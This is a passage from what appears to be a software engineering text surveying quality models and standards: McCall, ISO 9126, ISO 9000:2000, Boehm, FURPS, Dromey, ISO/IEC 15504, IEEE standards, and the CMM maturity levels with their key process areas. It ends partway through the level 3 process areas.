• The ISO 9126 model emphasizes characteristics visible to the users, whereas the McCall model considers internal qualities as well. For example, reusability is an internal characteristic of a product. Product developers strive to produce reusable components, whereas its impact is not perceived by customers.

• In McCall's model, one quality criterion can impact several quality factors, whereas in the ISO 9126 model, one subcharacteristic impacts exactly one quality characteristic.

• A high-level quality factor, such as testability, in the McCall model is a low-level subcharacteristic of maintainability in the ISO 9126 model.

Following are a few concerns with the quality models [4]:

• There is no consensus about what high-level quality factors are most important at the top level. McCall et al. suggest 11 high-level quality factors, whereas the ISO 9126 standard defines only 6 quality characteristics. Some of the quality factors in the McCall model are more important to developers. For example, reusability and interoperability are important to developers. However, the ISO 9126 model just considers the product.

• There is no consensus regarding what is a top-level quality factor/characteristic and what is a more concrete quality criterion/subcharacteristic. These days many applications run on computer and communications networks. However, interoperability is not an independent, top-level quality characteristic in the ISO 9126 model. It is not clear why interoperability is a part of functionality. The absence of a rationale makes it difficult to follow a prescribed quality model.

3 ISO 9000:2000 Model

There are ongoing efforts at the international level for standardizing different aspects of computer communications and software development. Standardization has been particularly successful in the field of computer networking and wireless communications. For example, the collaborative work of the Internet Engineering Task Force (IETF) has been the key to the proliferation of the Internet. Similarly, standardization efforts from the IEEE have led to the successful development of the local area network (LAN) standard, namely the IEEE 802.3 standard, and the wireless local area network (WLAN) standards, namely IEEE 802.11a/b/g.

In spite of the positive consequence of standardization in the field of communications, standardization in software development is met with mixed reactions.


On the one hand, the main argument against standardization is that it curtails individual drive to be innovative. On the other hand, standards reduce the activity of reinventing the same, or similar, processes for development and quality assurance. Repeatability of processes is a key benefit emanating from standardization, and repeatability reduces the cost of software development and produces a base quality level of software products.

The ISO has developed a series of standards, collectively known as the ISO 9000. The ISO was founded in 1946, and it is based in Geneva, Switzerland. It develops and promotes international standards in the field of quality assurance and quality management. The ISO 9000 standards are generally applicable to all tangible products manufactured with human endeavor, say, from spices to software; even some brands of spice and rice used in everyday cooking are claimed to be ISO 9000 certified. The ISO 9000 standards are reviewed and updated from time to time, once every 5–8 years. The latest ISO 9000 standards released in the year 2000 are referred to as ISO 9000:2000. There are three components of the ISO 9000:2000 standard as follows:

ISO 9000 : Fundamentals and vocabulary [7]

ISO 9001 : Requirements [8]

ISO 9004 : Guidelines for performance improvements [9]

At this point we remind the reader that ISO 9002 and ISO 9003 were parts of ISO 9000:1994, but these are no longer parts of ISO 9000:2000. ISO 9002 dealt with the quality system model for quality assurance in production and installation, whereas ISO 9003 dealt with the quality system model for quality assurance in final inspection and testing.

3.1 ISO 9000:2000 Fundamentals

The ISO 9000:2000 standard is based on the following eight principles:

• Principle 1. Customer Focus: Success of an organization is highly dependent on satisfying the customers. An organization must understand its customers and their needs on a continued basis. Understanding the customers helps in understanding and meeting their requirements. It is not enough to just meet customer requirements. Rather, organizations must make an effort to exceed customer expectations. By understanding the customers, one can have a better understanding of their real needs and their unstated expectations. People in different departments of an organization, such as marketing, software development, testing, and customer support, must capture the same view of the customers and their requirements. An example of customer focus is to understand how they are going to use a system. By accurately understanding how customers are going to use a system, one can produce a better user profile.

• Principle 2. Leadership: Leaders set the direction their organization should take, and they must effectively communicate this to all the people involved in the process. All the people in an organization must have a coherent view of the organizational direction. Without a good understanding of the organizational direction, employees will find it difficult to know where they are heading. Leaders must set challenging but realistic goals and objectives. Employee contribution should be recognized by the leaders. Leaders create a positive environment and provide support for the employees to collectively realize the organizational goal. They reevaluate their goals on a continual basis and communicate the findings to the staff.

• Principle 3. Involvement of People: In general, organizations rely on people. People are informed of the organizational direction, and they are involved at all levels of decision making. People are given an opportunity to develop their strength and use their abilities. People are encouraged to be creative in performing their tasks.

• Principle 4. Process Approach: There are several advantages to performing major tasks by using the concept of process. A process is a sequence of activities that transform inputs to outputs. Organizations can prepare a plan in the form of allocating resources and scheduling the activities by making the process defined, repeatable, and measurable. Consequently, the organization becomes efficient and effective. Continuous improvement in processes leads to improvement in efficiency and effectiveness.

• Principle 5. System Approach to Management: A system is an interacting set of processes. A whole organization can be viewed as a system of interacting processes. In the context of software development, we can identify a number of processes. For example, gathering customer requirements for a project is a distinct process involving specialized skills. Similarly, designing a functional specification by taking the requirements as input is another distinct process. There are simultaneous and sequential processes being executed in an organization. At any time, people are involved in one or more processes. A process is affected by the outcome of some other processes, and, in turn, it affects some other processes in the organization. It is important to understand the overall goal of the organization and the individual subgoals associated with each process. For an organization as a whole to succeed in terms of effectiveness and efficiency, the interactions among processes must be identified and analyzed.

• Principle 6. Continual Improvement: Continual improvement means that the processes involved in developing, say, software products are reviewed on a periodic basis to identify where and how further improvements in the processes can be effected. Since no process can be a perfect one to begin with, continual improvement plays an important role in the success of organizations. Since there are independent changes in many areas, such as customer views and technologies, it is natural to review the processes and seek improvements. Continual process improvements result in lower cost of production and maintenance. Moreover, continual improvements lead to fewer differences between the expected behavior and actual behavior of products. Organizations need to develop their own policies regarding when to start a process review and identify the goals of the review.

• Principle 7. Factual Approach to Decision Making: Decisions may be made based on facts, experience, and intuition. Facts can be gathered by using a sound measurement process. Identification and quantification of parameters are central to measurement. Once elements are quantified, it becomes easier to establish methods to measure those elements. There is a need for methods to validate the measured data and make the data available to those who need it. The measured data should be accurate and reliable. A quantitative measurement program helps organizations know how much improvement has been achieved due to a process improvement.

• Principle 8. Mutually Beneficial Supplier Relationships: Organizations rarely make all the components they use in their products. It is a common practice for organizations to procure components and subsystems from third parties. An organization must carefully choose the suppliers and make them aware of the organization's needs and expectations. The performance of the products procured from outside should be evaluated, and the need to improve their products and processes should be communicated to the suppliers. A mutually beneficial, cooperative relationship should be maintained with the suppliers.

3.2 ISO 9001:2000 Requirements

In this section, we will briefly describe five major parts of the ISO 9001:2000. For further details, we refer the reader to reference 8. The five major parts of the ISO 9001:2000, found in parts 4–8, are presented next.

Part 4: Systemic Requirements The concept of a quality management system (QMS) is the core of part 4 of the ISO 9001:2000 document. A quality management system is defined in terms of quality policy and quality objectives. In the software development context, an example of a quality policy is to review all work products by at least two skilled persons. Another quality policy is to execute all the test cases for at least two test cycles during system testing. Similarly, an example of a quality objective is to fix all defects causing a system to crash before release. Mechanisms are required to be defined in the form of processes to execute the quality policies and achieve the quality objectives. Moreover, mechanisms are required to be defined to improve the quality management system. Activities to realize quality policies and achieve quality objectives are defined in the form of interacting quality processes. For example, requirement review can be treated as a distinct process. Similarly, system-level testing is another process in the quality system. Interaction between the said processes occurs because of the need to make all requirements testable and the need to verify that all requirements have indeed been adequately tested. Similarly, measurement and analysis are important processes in modern-day software development. Improvements in an existing QMS are achieved by defining a measurement and analysis process and identifying areas for improvements.


Documentation is an important part of a QMS. There is no QMS without proper documentation. A QMS must be properly documented by publishing a quality manual. The quality manual describes the quality policies and quality objectives. Procedures for executing the QMS are also documented. As a QMS evolves by incorporating improved policies and objectives, the documents must accordingly be controlled. A QMS document must facilitate effective and efficient planning, execution, and management of organizational processes. Records generated as a result of executing organizational processes are documented and published to show evidence that various ISO 9001:2000 requirements have been met. All process details and organizational process interactions are documented. Clear documentation is key to understanding how one process is influenced by another. The documentation part can be summarized as follows:

• Document the organizational policies and goals. Publish a vision of the organization.

• Document all quality processes and their interrelationship.

• Implement a mechanism to approve documents before they are distributed.

• Review and approve updated documents.

• Monitor documents coming from suppliers.

• Document the records showing that requirements have been met.

• Document a procedure to control the records.

Part 5: Management Requirements The concept of quality cannot be dealt with in bits and pieces by individual developers and test engineers. Rather, upper management must accept the fact that quality is an all-pervasive concept. Upper management must make an effort to see that the entire organization is aware of the quality policies and quality goals. This is achieved by defining and publishing a QMS and putting in place a mechanism for its continual improvement. The QMS of the organization must be supported by upper management with the right kind and quantity of resources. The following are some important activities for upper management to perform in this regard:

• Generate an awareness for quality to meet a variety of requirements, such as customer, regulatory, and statutory.

• Develop a QMS by identifying organizational policies and goals concerning quality, developing mechanisms to realize those policies and goals, and allocating resources for their implementations.

• Develop a mechanism for continual improvement of the QMS.

• Focus on customers by identifying and meeting their requirements in order to satisfy them.

• Develop a quality policy to meet the customers' needs, serve the organization itself, and make it evolvable with changes in the marketplace and new developments in technologies.


• Deal with the quality concept in a planned manner by ensuring that quality objectives are set at the organizational level, quality objectives support quality policy, and quality objectives are measurable.

• Clearly define individual responsibilities and authorities concerning the implementation of quality policies.

• Appoint a manager with the responsibility and authority to oversee the implementation of the organizational QMS. Such a position gives clear visibility of the organizational QMS to the outside world, namely, to the customers.

• Communicate the effectiveness of the QMS to the staff so that the staff is in a better position to conceive improvements in the existing QMS model.

• Periodically review the QMS to ensure that it is an effective one and it adequately meets the organizational policy and objectives to satisfy the customers. Based on the review results and changes in the marketplace and technologies, actions need to be taken to improve the model by setting better policies and higher goals.

Part 6: Resource Requirements Resources are key to achieving organizational policies and objectives. Statements of policies and objectives must be backed up with allocation of the right kind and quantity of resources. There are different kinds of resources, namely, staff, equipment, tool, financial, and building, to name the major ones. Typically, different resources are controlled by different divisions of an organization. In general, resources are allocated to projects on a need basis. Since every activity in an organization needs some kind of resources, the resource management processes interact with other kinds of processes. The important activities concerning resource management are as follows:

• Identify and provide resources required to support the organizational quality policy in order to realize the quality objectives. Here the key factor is to identify resources to be able to meet, and even exceed, customer expectations.

• Allocate quality personnel resources to projects. Here, the quality of personnel is defined in terms of education, training, experience, and skills.

• Put in place a mechanism to enhance the quality level of personnel. This can be achieved by defining an acceptable, lower level of competence. For personnel to be able to move up to the minimum acceptable level of competence, it is important to identify and support an effective training program. The effectiveness of the training program must be evaluated on a continual basis.

• Provide and maintain the means, such as office space, computing needs, equipment needs, and support services, for successful realization of the organizational QMS.

• Manage a work environment, including physical, social, psychological, and environmental factors, that is conducive to producing efficiency and effectiveness in "people" resources.


Part 7: Realization Requirements This part deals with processes that transform customer requirements into products. The reader may note that not much has changed from ISO 9001:1994 to ISO 9001:2000 in the realization part. The key elements of the realization part are as follows:

• Develop a plan to realize a product from its requirements. The important elements of such a plan are identification of the processes needed to develop a product, sequencing the processes, and controlling the processes. Product quality objectives and methods to control quality during development are identified during planning.

• To realize a product for a customer, much interaction with the customer is necessary to understand and capture the requirements. Capturing requirements for a product involves identifying different categories of requirements, such as requirements generated by the customers, requirements necessitated by the product's use, requirements imposed by external agencies, and requirements deemed to be useful to the organization itself.

• Review the customers' requirements before committing to the project. Requirements that are not likely to be met should be rejected in this phase. Moreover, develop a process for communicating with the customers. It is important to involve the customers in all phases of product development.

• Once requirements are reviewed and accepted, product design and devel-opment take place:

Product design and development start with planning: Identify the stages of design and development, assign various responsibilities and authorities, manage interactions between different groups, and update the plan as changes occur.

Specify and review the inputs for product design and development.

Create and approve the outputs of product design and development. Use the outputs to control product quality.

Periodically review the outputs of design and development to ensure that progress is being made.

Perform design and development verifications on their outputs.

Perform design and development validations.

Manage the changes effected to design and development: Identify the changes, record the changes, review the changes, verify the changes, validate the changes, and approve the changes.

• Follow a defined purchasing process by evaluating potential suppliers based on a number of factors, such as ability to meet requirements and price, and verify that a purchased product meets its requirements.

• Put in place a mechanism and infrastructure for controlling production. This includes procedures for validating production processes, procedures for identifying and tracking both concrete and abstract items, procedures for protecting properties supplied by outside parties, and procedures for preserving organizational components and products.

• Identify the monitoring and measuring needs and select appropriate devices to perform those tasks. It is important to calibrate and maintain those devices. Finally, use those devices to gather useful data to know that the products meet the requirements.

Part 8: Remedial Requirements This part is concerned with measurement, analysis of measured data, and continual improvement. Measurement of performance indicators of processes allows one to determine how well a process is performing. If it is observed that a process is performing below the desired level, then corrective action can be taken to improve the performance of the process. Consider the following example. We find out the sources of defects during system-level testing and count, for example, those introduced in the design phase. If too many defects are found to be introduced in the design phase, actions are required to be taken to reduce the defect count. For instance, an alternative design review technique can be introduced to catch the defects in the design phase. In the absence of measurement it is difficult to make an objective decision concerning process improvement. Thus, measurement is an important activity in an engineering discipline. Part 8 of the ISO 9001:2000 addresses a wide range of performance measurement needs, as explained in the following (a small sketch of the defect-counting example appears after the list):

• The success of an organization is largely determined by the satisfaction of its customers. Thus, the standard requires organizations to develop methods and procedures for measuring and tracking the customer's satisfaction level on an ongoing basis. For example, the number of calls to the help line of an organization can be considered as a measure of customer satisfaction; too many calls is a measure of low customer satisfaction.

• An organization needs to plan and perform internal audits on a regular basis to track the status of the organizational QMS. An example of an internal audit is to find out whether or not personnel with adequate education, experience, and skill have been assigned to a project. An internal audit needs to be conducted by independent auditors using a documented procedure. Corrective measures are expected to be taken to address any deficiency discovered by the auditors.

• The standard requires that both processes, including QMS processes, and products be monitored using a set of key performance indicators. An example of measuring product characteristics is to verify whether or not a product meets its requirements. Similarly, an example of measuring process characteristics is to determine the level of modularity of a software system.

• As a result of measuring product characteristics, it may be discovered that a product does not meet its requirements. Organizations need to ensure that such products are not released to the customers. The causes of the differences between an expected product and the real one need to be identified.


• The standard requires that the data collected in the measurement processes are analyzed for making objective decisions. Data analysis is performed to determine the effectiveness of the QMS, impact of changes made to the QMS, level of customer satisfaction, conformance of products to their requirements, and performance of products and suppliers.

• We expect that products have defects, since manufacturing processes may not be perfect. However, once it is known that there are defects in products caused by deficiencies in the processes used, efforts must be made to improve the processes. Process improvement includes both corrective actions and preventive actions to improve the quality of products.
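Returning to the defect-source example in the Part 8 discussion above, counting defects by the phase that introduced them is a simple tally. A minimal sketch, using hypothetical defect records, might look like this:

    # A minimal sketch of the defect-source measurement example from the
    # Part 8 discussion above. The defect records are hypothetical.
    from collections import Counter

    defects = [
        {"id": 1, "introduced_in": "design"},
        {"id": 2, "introduced_in": "coding"},
        {"id": 3, "introduced_in": "design"},
        {"id": 4, "introduced_in": "requirements"},
    ]

    by_phase = Counter(d["introduced_in"] for d in defects)
    print(by_phase.most_common())
    # [('design', 2), ('coding', 1), ('requirements', 1)]
    # If "design" dominates, a corrective action such as an alternative
    # design review technique is warranted.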


4 Boehm's Quality Model (1978)

The second of the basic and founding predecessors of today's quality models is the quality model presented by Barry W. Boehm [12;13]. Boehm addresses the contemporary shortcomings of models that automatically and quantitatively evaluate the quality of software. In essence, his model attempts to qualitatively define software quality by a given set of attributes and metrics. Boehm's model is similar to the McCall quality model in that it also presents a hierarchical quality model structured around high-level characteristics, intermediate-level characteristics, and primitive characteristics, each of which contributes to the overall quality level.

The high-level characteristics represent basic, high-level requirements of actual use to which evaluation of software quality could be put – the general utility of software. The high-level characteristics address three main questions that a buyer of software has:

• As-is utility: How well (easily, reliably, efficiently) can I use it as-is?
• Maintainability: How easy is it to understand, modify and retest?
• Portability: Can I still use it if I change my environment?

The intermediate-level characteristics represent Boehm's 7 quality factors that together represent the qualities expected from a software system:

• Portability (General utility characteristics): Code possesses the characteristic portability to the extent that it can be operated easily and well on computer configurations other than its current one.

• Reliability (As-is utility characteristics): Code possesses the characteristic reliability to the extent that it can be expected to perform its intended functions satisfactorily.

• Efficiency (As-is utility characteristics): Code possesses the characteristic efficiency to the extent that it fulfills its purpose without waste of resources.

• Usability (As-is utility characteristics, Human Engineering): Code possesses the characteristic usability to the extent that it is reliable, efficient and human-engineered.

• Testability (Maintainability characteristics): Code possesses the characteristic testability to the extent that it facilitates the establishment of verification criteria and supports evaluation of its performance.

• Understandability (Maintainability characteristics): Code possesses the characteristic understandability to the extent that its purpose is clear to the inspector.

• Flexibility (Maintainability characteristics, Modifiability): Code possesses the characteristic modifiability to the extent that it facilitates the incorporation of changes, once the nature of the desired change has been determined. (Note the higher level of abstraction of this characteristic as compared with augmentability.)

The lowest level of the characteristics hierarchy in Boehm's model is the primitive-characteristics metrics hierarchy. The primitive characteristics provide the foundation for defining quality metrics – which was one of the goals when Boehm constructed his quality model. Consequently, the model presents one or more metrics² supposedly measuring a given primitive characteristic.

[Figure 4: tree diagram omitted. Node labels from the figure include General Utility; As-is Utility; Maintainability; Portability; Reliability; Efficiency; Human Engineering; Testability; Understandability; Modifiability; and the primitive characteristics Device Independence, Self Containedness, Accuracy, Completeness, Consistency, Robustness/Integrity, Accountability, Device Efficiency, Accessibility, Communicativeness, Self Descriptiveness, Structuredness, Conciseness, Legibility, and Augmentability.]

Figure 4: Boehm's Software Quality Characteristics Tree [13]. As-is Utility, Maintainability, and Portability are necessary (but not sufficient) conditions for General Utility. As-is Utility requires a program to be Reliable and adequately Efficient and Human-Engineered. Maintainability requires that the user be able to understand, modify, and test the program, and is aided by good Human-engineering.
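The upper layers of the tree can be captured in a small data structure. The following Python sketch encodes only what the caption above states; the edges from the intermediate factors down to the primitive characteristics are omitted, since they are not reproduced here:

    # Boehm's characteristics tree, upper two layers (per Figure 4's caption).
    BOEHM_TREE = {
        "General Utility": ["As-is Utility", "Maintainability", "Portability"],
        "As-is Utility": ["Reliability", "Efficiency", "Human Engineering"],
        "Maintainability": ["Testability", "Understandability", "Modifiability"],
    }

    # Primitive characteristics at the leaves of the full tree.
    PRIMITIVES = [
        "Device Independence", "Self Containedness", "Accuracy", "Completeness",
        "Consistency", "Robustness/Integrity", "Accountability",
        "Device Efficiency", "Accessibility", "Communicativeness",
        "Self Descriptiveness", "Structuredness", "Conciseness",
        "Legibility", "Augmentability",
    ]

    def expand(node: str) -> list[str]:
        """Expand a characteristic into the factors beneath it in the tree."""
        children = BOEHM_TREE.get(node)
        if children is None:
            return [node]
        result = []
        for child in children:
            result.extend(expand(child))
        return result

    print(expand("General Utility"))
    # ['Reliability', 'Efficiency', 'Human Engineering', 'Testability', ...]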

Though Boehm's and McCall's models might appear very similar, the difference is that McCall's model primarily focuses on the precise measurement of the high-level characteristic "As-is utility" (see Figure 4 above), whereas Boehm's quality model is based on a wider range of characteristics, with an extended and detailed focus primarily on maintainability. Figure 5 compares the two quality models, quality factor by quality factor.

Criteria/goals       McCall, 1977   Boehm, 1978
Correctness              *              *
Reliability              *              *
Integrity                *              *
Usability                *              *
Efficiency               *              *
Maintainability          *              *
Testability              *
Interoperability         *
Flexibility              *              *
Reusability              *              *
Portability              *              *
Clarity                                 *
Modifiability                           *
Documentation                           *
Resilience                              *
Understandability                       *
Validity                                *
Functionality
Generality                              *
Economy                                 *

² Defined by Boehm as: "a measure of extent or degree to which a product possesses and exhibits a certain (quality) characteristic".


Figure 5: Comparison between criteria/goals of the McCall and Boehm quality models [14].

As indicated in Figure 5 above, Boehm focuses much of the model's effort on software maintenance cost-effectiveness – which, he states, is the primary payoff of an increased capability with software quality considerations.

5. FURPS/FURPS+

A later, and perhaps somewhat less renowned, model that is structured in basically the same manner as the previous two quality models (but still worth mentioning in this context) is the FURPS model, originally presented by Robert Grady [15] (and extended by Rational Software [16-18] – now IBM Rational Software – into FURPS+³). FURPS stands for:

• Functionality – which may include feature sets, capabilities and security

• Usability – which may include human factors, aesthetics, consistency in the user interface, online and context-sensitive help, wizards and agents, user documentation, and training materials

• Reliability – which may include frequency and severity of failure, recoverability, predictability, accuracy, and mean time between failure (MTBF)

• Performance – imposes conditions on functional requirements such as speed, efficiency, availability, accuracy, throughput, response time, recovery time, and resource usage

• Supportability – which may include testability, extensibility, adaptability, maintainability, compatibility, configurability, serviceability, installability, and localizability (internationalization)

The FURPS categories are of two different types: Functional (F) and Non-functional (URPS). These categories can be used both as product requirements and in the assessment of product quality.

6. Dromey's Quality Model

An even more recent model, similar to McCall's, Boehm's and the FURPS(+) quality models, is the quality model presented by R. Geoff Dromey [19;20]. Dromey proposes a product-based quality model that recognizes that quality evaluation differs for each product, and that a more dynamic idea for modeling the process is needed, wide enough to apply to different systems. Dromey focuses on the relationship between the quality attributes and the sub-attributes, as well as attempting to connect software product properties with software quality attributes.

[Figure 6: diagram omitted. It links a software product to its product properties (correctness, internal, contextual, and descriptive properties of the implementation) and, through them, to quality attributes: correctness properties to functionality and reliability; internal properties to maintainability, efficiency, and reliability; contextual properties to maintainability, reusability, portability, and reliability; descriptive properties to maintainability, reusability, portability, and usability.]

Figure 6: Principles of Dromey's Quality Model

As Figure 6 illustrates, there are three principal elements to Dromey's generic quality model:

3 The "+" in FURPS+ includes such requirements as design constraints, implementation requirements, interface requirements and physical requirements.


1) Product properties that influence quality
2) High-level quality attributes
3) Means of linking the product properties with the quality attributes.

Dromey's Quality Model is further structured around a 5-step process:

1) Choose a set of high-level quality attributes necessary for the evaluation.
2) List the components/modules in your system.
3) Identify the quality-carrying properties for the components/modules (the qualities of the component that have the most impact on the product properties from the list above).
4) Determine how each property affects the quality attributes.
5) Evaluate the model and identify weaknesses.
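The following Python sketch illustrates steps 2–4 under the property-to-attribute mapping shown in Figure 6; the example components and the properties assigned to them are hypothetical:

    # Property categories -> quality attributes, following Figure 6.
    PROPERTY_TO_ATTRIBUTES = {
        "correctness": {"functionality", "reliability"},
        "internal":    {"maintainability", "efficiency", "reliability"},
        "contextual":  {"maintainability", "reusability", "portability", "reliability"},
        "descriptive": {"maintainability", "reusability", "portability", "usability"},
    }

    # Steps 2 and 3: components and their quality-carrying properties
    # (a hypothetical example system).
    components = {
        "parser":  ["correctness", "descriptive"],
        "storage": ["internal", "contextual"],
    }

    # Step 4: determine which quality attributes each component influences.
    for name, props in components.items():
        attrs = set()
        for prop in props:
            attrs |= PROPERTY_TO_ATTRIBUTES[prop]
        print(name, "->", sorted(attrs))

    # Step 5 (evaluation) would then look for attributes that no component
    # carries properties for -- a weakness in the product.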


7. ISO/IEC 15504 (SPICE)

ISO/IEC 15504: Information Technology – Software Process Assessment is a large international standard framework for process assessment that intends to address all processes involved in:

• Software acquisition
• Development
• Operation
• Supply
• Maintenance
• Support

ISO/IEC 15504 consists of 9 component parts covering concepts, process reference model and improvement guide, assessment model and guides, qualifications of assessors, and a guide for determining supplier process capability:

1) ISO/IEC 15504-1 Part 1: Concepts and Introductory Guide.
2) ISO/IEC 15504-2 Part 2: A Reference Model for Processes and Process Capability.
3) ISO/IEC 15504-3 Part 3: Performing an Assessment.
4) ISO/IEC 15504-4 Part 4: Guide to Performing Assessments.
5) ISO/IEC 15504-5 Part 5: An Assessment Model and Indicator Guidance.
6) ISO/IEC 15504-6 Part 6: Guide to Competency of Assessors.
7) ISO/IEC 15504-7 Part 7: Guide for Use in Process Improvement.
8) ISO/IEC 15504-8 Part 8: Guide for Use in Determining Supplier Process Capability.
9) ISO/IEC 15504-9 Part 9: Vocabulary.

Given the structure and contents of the ISO/IEC 15504 documentation, it is more closely related to ISO 9000, ISO/IEC 12207 and CMM than to the initially discussed quality models (McCall, Boehm and ISO 9126).

8. IEEE

IEEE has also released several standards more or less related to the topic covered within this technical paper. To name a few:

• IEEE Std 1220-1998: IEEE Standard for Application and Management of the Systems Engineering Process
• IEEE Std 730-1998: IEEE Standard for Software Quality Assurance Plans
• IEEE Std 828-1998: IEEE Standard for Software Configuration Management Plans – Description
• IEEE Std 829-1998: IEEE Standard for Software Test Documentation
• IEEE Std 830-1998: IEEE Recommended Practice for Software Requirements Specifications
• IEEE Std 1012-1998: IEEE Standard for Software Verification and Validation Plans
• IEEE Std 1016-1998: IEEE Recommended Practice for Software Design Descriptions
• IEEE Std 1028-1997: IEEE Standard for Software Reviews
• IEEE Std 1058-1998: IEEE Standard for Software Project Management Plans
• IEEE Std 1061-1998: IEEE Standard for a Software Quality Metrics Methodology
• IEEE Std 1063-2001: IEEE Standard for Software User Documentation
• IEEE Std 1074-1997: IEEE Standard for Developing Software Life Cycle Processes
• IEEE/EIA 12207.0-1996: Industry Implementation of International Standard ISO/IEC 12207:1995 (ISO/IEC 12207), Standard for Information Technology – Software Life Cycle Processes

Of the above-mentioned standards, it is probably the implementation of ISO/IEC 12207:1995 that most resembles the previously discussed models, in that it describes the processes for the following life cycle:

• Primary Processes: Acquisition, Supply, Development, Operation, and Maintenance.
• Supporting Processes: Documentation, Configuration Management, Quality Assurance, Verification, Validation, Joint Review, Audit, and Problem Resolution.
• Organization Processes: Management, Infrastructure, Improvement, and Training.

In fact, IEEE/EIA 12207.0-1996 is so similar to the ISO 9000 standard that it could actually be seen as a potential replacement for ISO within software engineering organizations.

The IEEE Std 1061-1998 is another standard that is relevant from the perspective of this technical paper as the standard provides a methodology for establishing quality requirements and identifying, implementing, analyzing and validating the process and product of software quality metrics.


9 CAPABILITY MATURITY MODEL

In software development processes we seek three desirable attributes as follows:

1. The products are of the highest quality. Ideally, a product should be free of defects. However, in practice, a small number of defects with less severe consequences are generally tolerated.

2. Projects are completed according to their plans, including the schedules.

3. Projects are completed within the allocated budgets.

However, developers of large software products rarely achieve the above three attributes. Due to the complex nature of software systems, products are released with known and unknown defects. The unknown defects manifest themselves as unexpected failures during field operation – that is, only then do we know that the system was released with unknown defects. In many organizations, software projects are often late and over budget. Given the business dimension of software development, it is important for the survival of organizations to develop low-cost, high-quality products within a short time. In order to move toward that goal, researchers and developers are devising new techniques and tools. However, the introduction of new techniques and tools into a process must be carefully planned in order to effect improvements in products.

While awarding a contract to an organization for a software product, the customer needs to gain confidence that the organization is capable of delivering the desired product. Such confidence can be gained by evaluating the capabilities of the organization. The U.S. Department of Defense, being a large customer of software systems, wanted to evaluate the capabilities of its software contractors; it wanted a framework to evaluate the maturity of the software processes used by organizations. Circa 1986, the SEI initiated the development of a framework to evaluate process maturity.

The maturity level of a development process tells us to what extent an organization is capable of producing low-cost, high-quality software. This evaluation framework is the CMM. After evaluating the current maturity level of a development process, organizations can work on improving the process to achieve the next higher level of process maturity. In the CMM framework, a process has five maturity levels. Before going into the details of the different maturity levels, it is useful to have a glimpse of an immature process – an organization can be considered immature if it follows immature processes [2].

On the one hand, an immature organization may not have a defined process, and, even if there is one, the organization may not follow it. Developers and managers react to problems when they occur, rather than taking preventive measures to eliminate them or reduce the frequency of their occurrence. In other words, product and process problems are resolved in an ad hoc manner. Estimates of cost, schedule, and quality are highly inaccurate due to the absence of a measurement program to gather process data. Hence, projects overrun cost and time estimates by a large factor. There is no measurement program to evaluate product or process quality.


On the other hand, a mature organization carries out its activities in a planned manner. Both process and product characteristics are measured to keep track of progress and the quality of products. Estimates are more accurate thanks to a rigorous measurement program. Employees are kept abreast of new developments through training. Continual effort is made to improve the quality of products while bringing down costs and lead times. Defined processes are continually updated to take advantage of new techniques, tools, and experience from past projects. As an organization becomes more and more mature, standards and organizational policies play key roles in product development. Organizations become mature in an incremental manner; that is, processes are improved in an evolutionary way, rather than through drastic changes.

As an organization moves from one level to the next, its process capability improves, enabling it to produce better quality software at a lower cost. The CMM defines five distinct levels of maturity, where level 1 is the initial level and level 5 is the highest level of process maturity.

9.1 CMM Architecture

First we explain the concept of a maturity level using Figure 18.1, followed by a detailed description of the individual levels. Figure 18.1 can be read as follows:

• A maturity level indicates process capability and contains key process areas (KPAs). The KPAs for each level are listed in Figure 18.2.

[Figure 18.1: diagram omitted. It shows that maturity levels indicate process capability and contain key process areas; key process areas achieve goals and are organized by common features; common features address implementation or institutionalization and contain key practices; key practices describe infrastructure or activities.]

Figure 18.1 CMM structure. (From ref. 3. © 2005 John Wiley & Sons.)


[Figure 18.2: diagram omitted. It lists the five maturity levels, the KPAs of each, and the process descriptor attached to each transition:

Level 1: Initial – no KPAs.
Level 2: Repeatable (disciplined process) – Requirements management; Software project planning; Software project tracking and oversight; Software subcontract management; Software quality assurance; Software configuration management.
Level 3: Defined (standard, consistent process) – Organization process focus; Organization process definition; Training program; Integrated software management; Software product engineering; Intergroup coordination; Peer review.
Level 4: Managed (predictable process) – Quantitative process management; Software quality management.
Level 5: Optimizing (continuously improving process) – Defect prevention; Technology change management; Process change management.]

Figure 18.2 SW-CMM maturity levels. (From ref. 3. © 2005 John Wiley & Sons.)

• Key process areas are expected to achieve goals and are organized by common features.

• Common features contain key practices and address implementation or institutionalization of the key practices.

• Key practices describe infrastructure or activities.

• When the key practices are followed, the goals of the KPAs are expected to be achieved.

• A maturity level is reached by meeting all the goals of all the KPAs at that level.

9.2 Five Levels of Maturity and Key Process Areas

The five levels of process maturity and their KPAs are explained as follows. The KPAs for each maturity level are listed in Figure 18.2.

Level 1: Initial At this level, software is developed without following any process model. There is not much planning involved, and even if a plan is prepared, it may not be followed. Individuals make decisions based on their own capabilities and skills. There is no KPA associated with level 1; an organization reaches level 1 without making any effort.


Level 2: Repeatable At this level, the concept of a process exists so that success can be repeated for similar projects. Performance of the proven activities of past projects is used to prepare plans for future projects. This level can be summarized as being disciplined, because processes are used for repeatability. All the processes are under the effective control of a project management system. The KPAs at level 2 are as follows:

• Requirements Management: It is important to establish a common understanding between the customer and the developers. Details of a project, such as planning and management, are guided by a common view of the customer requirements.

• Software Project Planning: This means creating and following a reasonable plan for realizing and managing a project.

• Software Project Tracking and Oversight: This means making the progress of a project visible so that management is aware of the status of the project. Corrective actions can be taken if the actual progress of a project significantly deviates from the planned progress.

• Software Subcontract Management: This means evaluating, selecting, and managing suppliers or subcontractors.

• Software Quality Assurance: This means evaluating processes and products to understand their effectiveness and quality.

• Software Configuration Management: This means ensuring the integrity of the products of a project for as long as the project continues to exist.

Level 3: Defined At this level, documentation plays a key role. Processes that are related to project management and software development activities are documented, reviewed, standardized, and integrated with organizational processes. In other words, there is organizationwide acceptance of standard processes. Software development is carried out by following an approved process. Functionalities and the associated qualities are tracked. Cost and schedule are monitored to keep them under control. The KPAs at level 3 are as follows:

• Organization Process Focus: This means putting in place an organizationwide role and responsibility to ensure that activities concerning process improvement are in fact followed.

• Organization Process Definition: Certain practices are useful irrespective of projects. Thus, it is important to identify and document those practices.

• Training Program: Individuals need to be trained on an ongoing basis to make them knowledgeable in application domains and new developments in software techniques and tools. Training is expected to make them effective and efficient.

• Integrated Software Management: This means integrating an organization's software engineering and management activities into a common, defined process. Integration is based on the commercial and technological needs of individual projects.


• Software Product Engineering: This means following a defined process in a consistent manner by integrating the technical activities to produce software with the desired attributes. The activities include requirements elicitation, functional design, detailed design, coding, and testing.

• Intergroup Coordination: This means that a software development group coordinates with other groups, such as customers, the marketing group, and the software quality assurance (SQA) group, to understand their needs and expectations.

